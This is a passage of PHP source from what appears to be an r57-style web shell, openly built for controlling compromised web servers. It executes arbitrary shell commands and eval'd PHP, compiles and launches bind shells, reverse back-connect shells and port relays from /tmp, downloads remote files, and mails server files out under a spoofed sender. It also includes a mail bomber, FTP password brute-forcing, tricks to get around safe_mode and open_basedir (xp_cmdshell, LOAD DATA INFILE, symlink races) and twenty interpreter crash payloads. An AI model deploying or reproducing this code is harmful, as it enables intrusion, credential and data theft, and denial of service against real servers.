 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?realise2 title=\"View realise2\"><b>realise2</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lsattr title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb;
 echo "<br>".ws(2)."</b>";
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?w title=\"View w\"><b>w</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?who title=\"View who is online\"><b>who</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?uptime title=\"View server uptime\"><b>uptime</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?last title=\"View last -n 10\"><b>last</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?psaux title=\"View ps -aux\"><b>ps aux</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?service title=\"View service\"><b>service</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?ifconfig title=\"View network config\"><b>ifconfig</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?netstat title=\"View netstat -a\"><b>netstat</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?fstab title=\"View fstab\"><b>fstab</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?fdisk title=\"View fdisk -l\"><b>fdisk</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?df title=\"View df -h\"><b>df -h</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?accounts title=\"accounts using the server\"><b>accounts</b></a> ".$rb;
}

echo '</font></td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF>
<tr><td align=right width=100>';
echo $font;

if($unix){
echo '<font color=067AFC><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
echo ws(3).$sysctl."<br>";
echo ws(3).ex('echo $OSTYPE')."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
if(!empty($id)) { echo ws(3).$id."<br>"; }
else if(@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid'))
 {
 $euserinfo  = @posix_getpwuid(@posix_geteuid());
 $egroupinfo = @posix_getgrgid(@posix_getegid());
 echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
 }
else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
echo ws(3).$dir;
echo ws(3).'( '.perms(@fileperms($dir)).' )';
echo "</b></font>";
}
else
{
echo '<font color=067AFC><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
echo ws(3).@substr(@php_uname(),0,120)."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
echo ws(3).@getenv("USERNAME")."<br>";
echo ws(3).$dir;
echo "<br></font>";
}
echo "</font>";
echo "</td></tr></table>";

if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
 {
 $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
 err(6+$res);
 $_POST['cmd']="";
 }
if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
 {
  if($file=@fopen($_POST['loc_file'],"r")){ $filedump = @fread($file,@filesize($_POST['loc_file'])); @fclose($file); }
  else if ($file=readzlib($_POST['loc_file'])) { $filedump = $file; } else { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
  if(isset($_POST['cmd']))
  {
    $filename = @basename($_POST['loc_file']);
    $content_encoding=$mime_type='';
    compress($filename,$filedump,$_POST['compress']);
    $attach = array(
                    "name"=>$filename,
                    "type"=>$mime_type,
                    "content"=>$filedump
                   );
    if(empty($_POST['subj'])) { $_POST['subj'] = 'You got a file from v4 Team'; }
    if(empty($_POST['from'])) { $_POST['from'] = 'hmb@gov.sd'; }
    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
    err(6+$res);
    $_POST['cmd']="";
  }
 }
if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size']))
 {
 for($h=1;$h<=$_POST['mail_flood'];$h++){
  $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ", 1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n");
 }
 err(6+$res);
 $_POST['cmd']="";
 }
if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
{
$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
 {
 switch($_POST['what'])
   {
   case 'own':
   @chown($_POST['param1'],$_POST['param2']);
   break;
   case 'grp':
   @chgrp($_POST['param1'],$_POST['param2']);
   break;
   case 'mod':
   @chmod($_POST['param1'],intval($_POST['param2'], 8));
   break;
   }
 $_POST['cmd']="";
 }
if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
 {
   switch($_POST['what'])
   {
     case 'file':
      if($_POST['action'] == "create")
       {
       if(@file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
       else {
        @fclose($file);
        $_POST['e_name'] = $_POST['mk_name'];
        $_POST['cmd']="edit_file";
        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF><tr><td bgcolor=#0C0C0C><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
        }
       }
       else if($_POST['action'] == "delete")
       {
       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF><tr><td bgcolor=#0C0C0C><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
       $_POST['cmd']="";
       }
     break;
     case 'dir':
      if($_POST['action'] == "create"){
      if(@mkdir($_POST['mk_name']))
       {
         $_POST['cmd']="";
         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF><tr><td bgcolor=#0C0C0C><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
       }
      else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
      }
      else if($_POST['action'] == "delete"){
      if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF><tr><td bgcolor=#0C0C0C><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
      $_POST['cmd']="";
      }
     break;
   }
 }


if(!empty($_POST['cmd']) && $_POST['cmd']=="touch")
{
if(!$_POST['file_name_r'])
 {
  $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds";
  $datar = @strtotime($datar);
  @touch($_POST['file_name'],$datar,$datar);}
else{
  @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r']));
}
$_POST['cmd']="";
}


if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
 {
 if(!$file=@fopen($_POST['e_name'],"r+")) { $filedump = @fread($file,@filesize($_POST['e_name'])); @fclose($file); $only_read = 1; }
 if($file=@fopen($_POST['e_name'],"r")) { $filedump = @fread($file,@filesize($_POST['e_name'])); @fclose($file); }
 else if ($file=readzlib($_POST['e_name'])) { $filedump = $file; $only_read = 1; } else { err(1,$_POST['e_name']); $_POST['cmd']=""; }
 if(isset($_POST['cmd']))
 {
 echo $table_up3;
 echo $font;
 echo "<form name=save_file method=post>";
 echo ws(3)."<b>".$_POST['e_name']."</b>";
 echo "<div align=center><textarea name=e_text cols=121 rows=24>";
 echo @htmlspecialchars($filedump);
 echo "</textarea>";
 echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
 echo "<input type=hidden name=dir value=".$dir.">";
 echo "<input type=hidden name=cmd value=save_file>";
 echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
 echo "</div>";
 echo "</font>";
 echo "</form>";
 echo "</td></tr></table>";
 exit();
 }
 }
if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
 {
 $mtime = @filemtime($_POST['e_name']);
 if((!$file=@fopen($_POST['e_name'],"w")) && (!function_exists('file_put_contents'))) { err(0,$_POST['e_name']); }
 else {
 if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
 @fwrite($file,$_POST['e_text']) or @fputs($file,$_POST['e_text']) or @file_put_contents($_POST['e_name'],$_POST['e_text']);
 @touch($_POST['e_name'],$mtime,$mtime);
 $_POST['cmd']="";
 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF><tr><td bgcolor=#0C0C0C><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
 }
 }


if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl"))
{
 cf("/tmp/prxpl",$prx_pl);
 $p2=which("perl");
 $blah = ex($p2." /tmp/prxpl ".$_POST['proxy_port']." &");
 $_POST['cmd']="ps -aux | grep prxpl";
}
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
{
 cf("/tmp/bd.c",$port_bind_bd_c);
 $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
 @unlink("/tmp/bd.c");
 $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
 $_POST['cmd']="ps -aux | grep bd";
}
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
{
 cf("/tmp/bdpl",$port_bind_bd_pl);
 $p2=which("perl");
 $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
 $_POST['cmd']="ps -aux | grep bdpl";
}
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
{
 cf("/tmp/back",$back_connect);
 $p2=which("perl");
 $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
}
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
{
 cf("/tmp/back.c",$back_connect_c);
 $blah = ex("gcc -o /tmp/backc /tmp/back.c");
 @unlink("/tmp/back.c");
 $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
}
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
{
 cf("/tmp/dp",$datapipe_pl);
 $p2=which("perl");
 $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
 $_POST['cmd']="ps -aux | grep dp";
}
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
{
 cf("/tmp/dpc.c",$datapipe_c);
 $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
 @unlink("/tmp/dpc.c");
 $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
 $_POST['cmd']="ps -aux | grep dpc";
}

if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }

for($upl=0;$upl<=16;$upl++)
{
 if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){
  if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; }
  else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; }
  @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn)
  or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>");
 }
}

if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
{
 switch($_POST['with'])
 {
 case 'fopen':
 $datafile = @implode("", @file($_POST['rem_file']));
 if($datafile)
  {
   $w_file=@fopen($_POST['loc_file'],"wb") or @function_exists('file_put_contents') or err(0);
   if($w_file)
   {
    @fwrite($w_file,$datafile) or @fputs($w_file,$datafile) or @file_put_contents($_POST['loc_file'],$datafile);
    @fclose($w_file);
   }
  }
 $_POST['cmd'] = '';
 break;
 case 'wget':
 $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
 break;
 case 'fetch':
 $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
 break;
 case 'lynx':
 $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
 break;
 case 'links':
 $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
 break;
 case 'GET':
 $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
 break;
 case 'curl':
 $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
 break;
 }
}
if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_file_up") || ($_POST['cmd']=="ftp_file_down")))
 {
 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
 if(empty($ftp_port)) { $ftp_port = 21; }
 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
 if(!$connection) { err(3); }
 else
  {
  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
  else
   {
   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);}
   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);}
   }
  }
 @ftp_close($connection);
 $_POST['cmd'] = "";
 }

if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_brute") || ($_POST['cmd']=="db_brute")))
 {
 if($_POST['cmd']=="ftp_brute"){
  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
  if(empty($ftp_port)) { $ftp_port = 21; }
  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
 }else if($_POST['cmd']=="db_brute"){
   $connection = 1;
 }
 if(!$connection) { err(3); $_POST['cmd'] = ""; }
 else if(($_POST['brute_method']=='passwd') && (!$users=get_users('/etc/passwd'))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF><tr><td bgcolor=#0C0C0C><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
 else if(($_POST['brute_method']=='dic') && (!$users=get_users($_POST['dictionary']))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF><tr><td bgcolor=#0C0C0C><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
 if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);}
 }

echo $table_up3;
if (empty($_POST['cmd']) && !$safe_mode && !$open_basedir) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
else if(empty($_POST['cmd']) && ($safe_mode || $open_basedir)){ $_POST['cmd']="safe_dir"; }
echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
if($safe_mode || $open_basedir)
{
 switch($_POST['cmd'])
 {
 case 'safe_dir':
  $d=@dir($dir);
  if ($d)
   {
   while (false!==($file=$d->read()))
    {
     if ($file=="." || $file=="..") continue;
     @clearstatcache();
     @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
     if(!$unix){
     echo date("d.m.Y H:i",$mtime);
     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
     }
     else{
     if(@function_exists('posix_getpwuid')){
      $owner = @posix_getpwuid($uid);
      $grgid = @posix_getgrgid($gid);
     }else{$owner['name']=$grgid['name']='';}
     echo $inode." ";
     echo perms(@fileperms($file));
     @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
     echo date("d.m.Y H:i ",$mtime);
     }
     echo "$file\n";
    }
   $d->close();
   }
  else if(@function_exists('glob'))
   {
       function eh($errno, $errstr, $errfile, $errline)
        {
          global $D, $c, $i;
          preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
          if($o){ $D[$c] = $o[2]; $c++;}
        }
       $error_reporting = @ini_get('error_reporting');
       error_reporting(E_WARNING);
       @ini_set("display_errors", 1);
       $root = "/";
       if($dir) $root = $dir;
       $c = 0; $D = array();
       @set_error_handler("eh");
       $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
       for($i=0; $i < strlen($chars); $i++)
       {
        $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
        $prevD = $D[count($D)-1];
        @glob($path."*");
        if($D[count($D)-1] != $prevD)
         {
           for($j=0; $j < strlen($chars); $j++)
           {
            $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
            $prevD2 = $D[count($D)-1];
            @glob($path."*");
            if($D[count($D)-1] != $prevD2)
             {
              for($p=0; $p < strlen($chars); $p++)
               {
                $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
                $prevD3 = $D[count($D)-1];
                @glob($path."*");
                if($D[count($D)-1] != $prevD3)
                 {
                  for($r=0; $r < strlen($chars); $r++)
                   {
                    $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
                    @glob($path."*");
                   }
                 }
               }
             }
           }
         }
       }
       $D = array_unique($D);
       foreach($D as $item) echo htmlspecialchars("{$item}")."\r\n";
       error_reporting($error_reporting);
   }
  else echo $lang[$language.'_text29'];
 break;
  case 'test1':
  $ci = @curl_init("file://".$_POST['test1_file']);
  $cf = @curl_exec($ci);
  echo htmlspecialchars($cf);
  break;
  case 'test2':
  @include($_POST['test2_file']);
  break;
  case 'test3':
  if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
  if($db)
   {
   if(@mysql_select_db($_POST['test3_md'],$db))
    {
     @mysql_query("DROP TABLE IF EXISTS temp_hmb57_table");
     @mysql_query("CREATE TABLE `temp_hmb57_table` ( `file` LONGBLOB NOT NULL )");
     @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_hmb57_table");
     $r = @mysql_query("SELECT * FROM temp_hmb57_table");
     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }
     @mysql_query("DROP TABLE IF EXISTS temp_hmb57_table");
    }
    else echo "[-] ERROR! Can't select database";
   @mysql_close($db);
   }
  else echo "[-] ERROR! Can't connect to mysql server";
  break;
  case 'test4':
  if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
  if($db)
   {
   if(@mssql_select_db($_POST['test4_md'],$db))
    {
     @mssql_query("drop table hmb57_temp_table",$db);
     @mssql_query("create table hmb57_temp_table ( string VARCHAR (500) NULL)",$db);
     @mssql_query("insert into hmb57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
     $res = mssql_query("select * from hmb57_temp_table",$db);
     while(($row=@mssql_fetch_row($res)))
      {
      echo htmlspecialchars($row[0])."\r\n";
      }
    @mssql_query("drop table hmb57_temp_table",$db);
    }
    else echo "[-] ERROR! Can't select database";
   @mssql_close($db);
   }
  else echo "[-] ERROR! Can't connect to MSSQL server";
  break;
  case 'test5':
  $temp=tempnam($dir, "fname");
  if (@file_exists($temp)) @unlink($temp);
  $extra = "-C ".$_POST['test5_file']." -X $temp";
  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
  $str = moreread($temp);
  echo htmlspecialchars($str);
  @unlink($temp);
  break;
  case 'test6':
  $stream = @imap_open('/etc/passwd', "", "");
  $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
  for ($i = 0; $i < count($dir_list); $i++) echo htmlspecialchars($dir_list[$i])."\r\n";
  @imap_close($stream);
  break;
  case 'test7':
  $stream = @imap_open($_POST['test7_file'], "", "");
  $str = @imap_body($stream, 1);
  echo htmlspecialchars($str);
  @imap_close($stream);
  break;
  case 'test8':
  $temp=@tempnam($_POST['test8_file2'], "copytemp");
  $str = readzlib($_POST['test8_file1'],$temp);
  echo htmlspecialchars($str);
  @unlink($temp);
  break;
  case 'test9':
  @ini_restore("safe_mode");
  @ini_restore("open_basedir");
  $str = moreread($_POST['test9_file']);
  echo htmlspecialchars($str);
  break;
  case 'test10':
  @ob_clean();
  $error_reporting = @ini_get('error_reporting');
  error_reporting(E_ALL ^ E_NOTICE);
  @ini_set("display_errors", 1);
  $str=fopen($_POST['test10_file'],"r");
  while(!feof($str)){print htmlspecialchars(fgets($str));}
  fclose($str);
  error_reporting($error_reporting);
  break;
  case 'test11':
  @ob_clean();
  $temp = 'zip://'.$_POST['test11_file'];
  $str = moreread($temp);
  echo htmlspecialchars($str);
  break;
  case 'test12':
  @ob_clean();
  $temp = 'compress.bzip2://'.$_POST['test12_file'];
  $str = moreread($temp);
  echo htmlspecialchars($str);
  break;
  case 'test13':
  @error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../".$_POST['test13_file2']);
  echo $lang[$language.'_text61'];
  break;
  case 'test14':
  @session_save_path($_POST['test14_file2']."\0;/tmp");
  @session_start();
  @$_SESSION[php]=$_POST['test14_file1'];
  echo $lang[$language.'_text61'];
  break;
  case 'test15':
  @readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../".$_POST['test15_file2']);
  echo $lang[$language.'_text61'];
  break;
  case 'test16':
  if (fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];
  break;
  case 'test17_1':
  @unlink('symlinkread');
  @symlink('a/a/a/a/a/a/', 'dummy');
  @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'], 'symlinkread');
  @unlink('dummy');
  while (1)
   {
    @symlink('.', 'dummy');
    @unlink('dummy');
   }
  break;
  case 'test17_2':
  $str='';
  while (strlen($str) < 3) {
   $temp = 'symlinkread';
   $str = moreread($temp);
   if($str){ @ob_clean(); echo htmlspecialchars($str);}
  }
  break;
  case 'test17_3':
  $dir = $files = array();
  if(@version_compare(@phpversion(),"5.0.0")>=0){
   while (@count($dir) < 3) {
    $dir=@scandir('symlinkread');
    if (@count($dir) > 2) {@ob_clean(); @print_r($dir); }
   }
  }
  else {
   while (@count($files) < 3) {
    $dh  = @opendir('symlinkread');
    while (false !== ($filename = @readdir($dh))) {
     $files[] = $filename;
    }
    if(@count($files) > 2){@ob_clean(); @print_r($files); }
   }
  }
  break;
 }
}
if((!$safe_mode) && ($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute") && ($_POST['cmd']!="db_brute")){
 $cmd_rep = ex($_POST['cmd']);
 if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
 else { echo @htmlspecialchars($cmd_rep)."\n"; }}

switch($_POST['cmd'])
{
 case 'dos1':
 function a() { a(); } a();
 break;
 case 'dos2':
 @pack("d4294967297", 2);
 break;
 case 'dos3':
 $a = "a";@unserialize(@str_replace('1', 2147483647, @serialize($a)));
 break;
 case 'dos4':
 $t = array(1);while (1) {$a[] = &$t;};
 break;
 case 'dos5':
 @dl("sqlite.so");$db = new SqliteDatabase("foo");
 break;
 case 'dos6':
 preg_match('/(.(?!b))*/', @str_repeat("a", 10000));
 break;
 case 'dos7':
 @str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538));
 break;
 case 'dos8':
 @shell_exec("killall -11 httpd");
 break;
 case 'dos9':
 function cx(){ @tempnam("/www/", "../../../../../../var/tmp/cx"); cx(); } cx();
 break;
 case 'dos10':
 $a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0);
 break;
 case 'dos11':
 @array_fill(1,123456789,"Infigo-IS");
 break;
 case 'dos12':
 @substr_compare("A","A",12345678);
 break;
 case 'dos13':
 @unserialize("a:2147483649:{");
 break;
 case 'dos14':
 $Data = @str_ireplace("\n", "<br>", $Data);
 break;
 case 'dos15':
 function toUTF($x) {return chr(($x >> 6) + 192) . chr(($x & 63) + 128);}
 $str1 = "";for($i=0; $i < 64; $i++){ $str1 .= toUTF(977);}
 @htmlentities($str1, ENT_NOQUOTES, "UTF-8");
 break;
 case 'dos16':
 $r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r, $e);
 for ($i=0; $i<1000; $i++) $arr[$i]=array(array(""));
 unset($arr[600]);@zip_entry_read($e, -1);unset($arr[601]);
 break;
 case 'dos17':
 $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU";
 $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD";
 $x = "AQ                                                                        ";
 unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x);
 break;
 case 'dos18':
 $MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY, 0600);
 if (!@msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err))
 echo "Msg not sent because $msg_err\n";
 if (@msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) {
 echo "$msg\n";
 } else { echo "Received $msg_error fetching message\n"; break; }
 @msg_remove_queue ($msg_id);
 break;
 case 'dos19':
 $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd"; @fopen($url, "r");
 break;
 case 'dos20':
 $hashtable = str_repeat("A", 39);
 $hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08);
 $hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99);
 $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';
 for ($i=0; $i<65535; $i++) { $str .= 'i:0;R:2;'; }
 $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;';
 @unserialize($str);
 break;
}

if ($_POST['cmd']=="php_eval"){
 $eval = @str_replace("<?","",$_POST['php_eval']);
 $eval = @str_replace("?>","",$eval);
 @eval($eval);}

if ($_POST['cmd']=="ftp_brute")
 {
 $suc = 0;
 if($_POST['brute_method']=='passwd'){
 foreach($users as $user)
  {
    $connection = @ftp_connect($ftp_server,$ftp_port,10);
    if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
    else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
    @ftp_close($connection);
  }
 }else if(($_POST['brute_method']=='dic') && isset($_POST['ftp_login'])){
  foreach($users as $user)
  {
    $connection = @ftp_connect($ftp_server,$ftp_port,10);
    if(@ftp_login($connection,$_POST['ftp_login'],$user)) { echo "[+] ".$_POST['ftp_login'].":$user - success\r\n"; $suc++; }
    @ftp_close($connection);
  }
 }
 echo "\r\n-------------------------------------\r\n";
 $count = count($users);
 if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
 echo $lang[$language.'_text97'].$count."\r\n";
